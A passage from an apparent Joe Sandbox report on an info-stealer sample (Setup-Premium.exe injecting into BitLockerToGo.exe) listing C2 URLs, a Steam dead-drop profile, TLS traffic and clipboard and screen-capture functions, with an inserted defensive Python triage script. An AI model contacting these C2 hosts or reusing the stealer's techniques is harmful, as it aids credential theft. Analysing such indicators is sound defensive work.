                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/E
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/api
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vennurviot.sbs/apii
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F96000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-managy
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-managyPHPgg
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.152.13:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.205.156:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49757 version: TLS 1.2
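The URL and TLS rows above are raw memory scrapes: the same C2 gate shows up several times with a stray trailing byte (/api beside /apiM and /apii, / beside /% and /-), mixed with a large amount of legitimate Steam, Valve and Cloudflare content that the injected BitLockerToGo.exe process picked up while fetching those pages. The Python script below is an added triage example, not part of the Joe Sandbox report or of any vendor tooling: it parses rows of this shape, collapses the trailing-byte variants per host, separates hosts on an analyst-maintained allowlist (the allowlist is an assumption, illustrative only) from C2 candidates, records the Steam profile ID as its own indicator, and lists the TLS endpoints. The sample rows are constructed copies of a handful of lines from this section with the .sdmp source lists shortened. Keeping the profile ID separately matters for this family: Lumma samples have been reported to resolve their live C2 domain from a Steam profile page, so the profile URL is worth retaining as an indicator even though steamcommunity.com itself is benign.

```python
"""Triage of Joe Sandbox 'String found in binary or memory' and 'HTTPS traffic
detected' rows. Added example, not part of the report."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample rows, shaped like the rows in this report section (the long
# .sdmp source lists are shortened). Not sandbox output.
SAMPLE_ROWS = [
    "Source: Setup-Premium.exe | String found in binary or memory: https://gorm.io/docs/hooks.htmlWarning:",
    "Source: BitLockerToGo.exe, 00000002.00000003.2183297651.sdmp | String found in binary or memory: https://mathcucom.sbs/",
    "Source: BitLockerToGo.exe, 00000002.00000003.2183297651.sdmp | String found in binary or memory: https://mathcucom.sbs/api",
    "Source: BitLockerToGo.exe, 00000002.00000003.2288941580.sdmp | String found in binary or memory: https://sergei-esenin.com/",
    "Source: BitLockerToGo.exe, 00000002.00000003.2288941580.sdmp | String found in binary or memory: https://sergei-esenin.com/%",
    "Source: BitLockerToGo.exe, 00000002.00000003.2288941580.sdmp | String found in binary or memory: https://sergei-esenin.com/api",
    "Source: BitLockerToGo.exe, 00000002.00000002.2300154573.sdmp | String found in binary or memory: https://sergei-esenin.com/apiM",
    "Source: BitLockerToGo.exe, 00000002.00000003.2250209476.sdmp | String found in binary or memory: https://vennurviot.sbs/api",
    "Source: BitLockerToGo.exe, 00000002.00000003.2250209476.sdmp | String found in binary or memory: https://vennurviot.sbs/apii",
    "Source: BitLockerToGo.exe, 00000002.00000003.2282297159.sdmp | String found in binary or memory: https://steamcommunity.com/",
    "Source: BitLockerToGo.exe, 00000002.00000003.2288941580.sdmp | String found in binary or memory: https://steamcommunity.com/E",
    "Source: BitLockerToGo.exe, 00000002.00000003.2288941580.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900",
    "Source: BitLockerToGo.exe, 00000002.00000003.2288941580.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing",
    "Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2",
    "Source: unknown | HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.5:49751 version: TLS 1.2",
]

# Analyst allowlist (assumption): hosts referenced by the sample that are
# legitimate services or Go library documentation, not attacker-controlled.
BENIGN_DOMAINS = {
    "steamcommunity.com", "store.steampowered.com", "help.steampowered.com",
    "www.valvesoftware.com", "www.cloudflare.com", "gorm.io", "index.docker.io",
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
TLS_RE = re.compile(
    r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (TLS [\d.]+)"
)
STEAM_PROFILE_RE = re.compile(r"steamcommunity\.com/profiles/(\d{17})")


def extract_urls(rows):
    """Return every URL literal found in the rows, in order, duplicates kept."""
    return [m.group(0) for row in rows for m in URL_RE.finditer(row)]


def collapse_variants(urls):
    """Group URLs by host and drop any path that equals another path from the
    same host plus exactly one trailing character. A memory scrape often picks
    up the byte that follows the string, which yields '/apiM' beside '/api'."""
    by_host = defaultdict(set)
    for url in urls:
        parts = urlsplit(url)
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
        by_host[parts.hostname or ""].add(path)
    return {
        host: sorted(p for p in paths if not (len(p) > 1 and p[:-1] in paths))
        for host, paths in by_host.items()
    }


def parse_tls(rows):
    """Pull server IP and port, client port and TLS version from traffic rows."""
    endpoints = []
    for row in rows:
        m = TLS_RE.search(row)
        if m:
            endpoints.append({
                "server": m.group(1), "server_port": int(m.group(2)),
                "client_port": int(m.group(4)), "version": m.group(5),
            })
    return endpoints


def triage(rows):
    """Split referenced hosts into C2 candidates and allowlisted references,
    keep Steam profile IDs as a separate indicator, and list TLS endpoints."""
    urls = extract_urls(rows)
    result = {"c2_candidates": {}, "benign_reference": {},
              "steam_profile_ids": [], "tls_endpoints": parse_tls(rows)}
    for host, paths in collapse_variants(urls).items():
        bucket = "benign_reference" if host in BENIGN_DOMAINS else "c2_candidates"
        result[bucket][host] = paths
    result["steam_profile_ids"] = sorted(
        {m.group(1) for u in urls for m in [STEAM_PROFILE_RE.search(u)] if m}
    )
    return result


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ROWS).items():
        print(f"{key}: {value}")
```

The one-trailing-character rule is deliberately narrow: it removes the scrape residue without touching genuinely different paths such as /profiles/... beside /, and anything it cannot decide is left in the output for the analyst rather than guessed away. The TLS rows carry no hostname, so the server IPs are reported as observed and are not mapped onto the C2 candidates here.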
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00435320 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004354A0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,StretchBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,DeleteObject
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043A36A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00410F13
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00401000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00442010
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004350E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041F0A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004270A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00433160
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00444120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004081B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004292C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041D2F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042A2F3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040135D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040D330
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004203A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004013A7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040A410
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042D416
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00411436
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004224C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004394D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00421490
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004424B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043E650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00401655
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004266DB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004036E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040F74C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00439730
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004417C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004427C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004077D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004107EB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004117F1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042B799
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041D8C8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00442880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042E940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00442960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00406A30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040BA80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040AAB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00441B40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040EBD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00443B80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00416CC1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00408C9E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042BCB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00442CB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00410D40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00421D60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00406DD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00438DEA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00404DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0042AD8C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00426E68
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00443E20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00426E2C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040DE3F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00409EC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00439EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041CEB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040AF70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00440F74
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00432F30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 0040C570 appears 72 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 0040DD20 appears 190 times
Source: Setup-Premium.exe, 00000000.00000002.2172857628.00000000027A6000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Setup-Premium.exe
Source: Setup-Premium.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.evad.winEXE@3/0@11/8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0043A1B0 CoCreateInstance
Source: Setup-Premium.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Setup-Premium.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Setup-Premium.exe | String found in binary or memory: github.com/go-openapi/loads
Source: Setup-Premium.exe | String found in binary or memory: 2github.com/docker/docker-credential-helpers/client
Source: Setup-Premium.exe | String found in binary or memory: 2github.com/klauspost/compress/zstd/internal/xxhash2github.com/docker/docker-credential-helpers/client
Source: Setup-Premium.exe | String found in binary or memory: 7github.com/docker/docker-credential-helpers/credentials
Source: Setup-Premium.exe | String found in binary or memory: StacktraceKey)json:"stacktraceKey" yaml:"stacktraceKey"7github.com/spf13/viper/internal/encoding/javaproperties7*map.bucket[protowire.Number]protoreflect.ExtensionType7*struct { F uintptr; X0 *int; X1 proto.MarshalOptions }7*func(context.Context, float64, ...metric.RecordOption)7github.com/docker/docker-credential-helpers/credentials7*func(kem.PublicKey, []uint8) ([]uint8, []uint8, error)7github.com/cloudflare/circl/pke/kyber/kyber512/internal7github.com/cloudflare/circl/pke/kyber/kyber768/internal8*func(string, ...nats.WatchOpt) (nats.KeyWatcher, error)8*func(*nats.ObjectStoreConfig) (nats.ObjectStore, error)8*func(string, []uint8, time.Duration) (*nats.Msg, error)8*struct { F uintptr; X0 *nats.js; X1 string; X2 string }
Source: Setup-Premium.exe | String found in binary or memory: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module data in goroutine runtime: seq1=runtime: goid=RegSetValueExWboringcrypto: .WithoutCancel.WithDeadline(zero parameterinvalid syntax1907348632812595367431640625createLogEntrysearchLogQuerysignedTreeHeadintegratedTimedata truncatedinternal errorContent-LengthMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAM; SameSite=LaxERR_UNKNOWN_%daccept-charsetcontent-lengthread_frame_eof{$} not at endempty wildcardinvalid methodparsing %q: %wunknown error unknown code: Not Acceptable\.+*?()|[]{}^$x509ignoreCN=1validate.rulesreserved_rangefield_presenceunsafe.Pointer on zero Valuereflect.Value.unknown methodbad record MACunexpected EOF.in-addr.arpa.unknown mode: Accept-CharsetDkim-SignatureControlServiceCreateServiceWIsWellKnownSidMakeAbsoluteSDOpenSCManagerWSetThreadTokenClearCommBreakClearCommErrorCreateEventExWCreateMutexExWGetTickCount64IsWow64ProcessLoadLibraryExWModule32FirstWSetConsoleModeSizeofResourceVirtualProtectVirtualQueryExCoInitializeExCoUninitializeGetShellWindowVerQueryValueWunreachable: /log/filter.go/log/helper.go
Source: Setup-Premium.exe | String found in binary or memory: invalid Trailer key already registeredProxy-Authorizationunknown status codeunexpected InstFailBLOB_UPLOAD_INVALIDjava_multiple_filescc_generic_servicespy_generic_servicesdeprecation_warningreflect.Value.Bytesreflect.Value.Fieldreflect.Value.Indexreflect.Value.Slicereflect.Value.Clearreflect.AppendSlice are not comparablerevoked certificateexpired certificateunknown certificateunknown cipher typeinvalid MAC addresscriterion too shortinvalid URL escape missing ']' in hostQueryServiceConfigWSetTokenInformationCreatePseudoConsoleDisconnectNamedPipeGetDiskFreeSpaceExWGetLargePageMinimumGetOverlappedResultGetSystemDirectoryWMultiByteToWideCharResizePseudoConsoleRtlAddFunctionTableGetForegroundWindowLoadKeyboardLayoutWGetFileVersionInfoWCanadian_AboriginalKhitan_Small_Scriptfile already existsfile does not existfile already closedexec: canceling Cmdinvalid blocklen %dinvalid data len %dmultipartmaxheaders20060102150405Z0700.docker/config.jsonmodulus must be oddContent-DispositionRawValueEncodeValueRawValueDecodeValuemail: no angle-addrconsumeAddrSpec: %qconsumePhrase: [%s]invalid UUID formatinvalid character 'while parsing a tagPrerelease is emptyno public key foundmime: no media typeevictCount overflow "(),/:;<=>?@[]\{}untrusted comment:
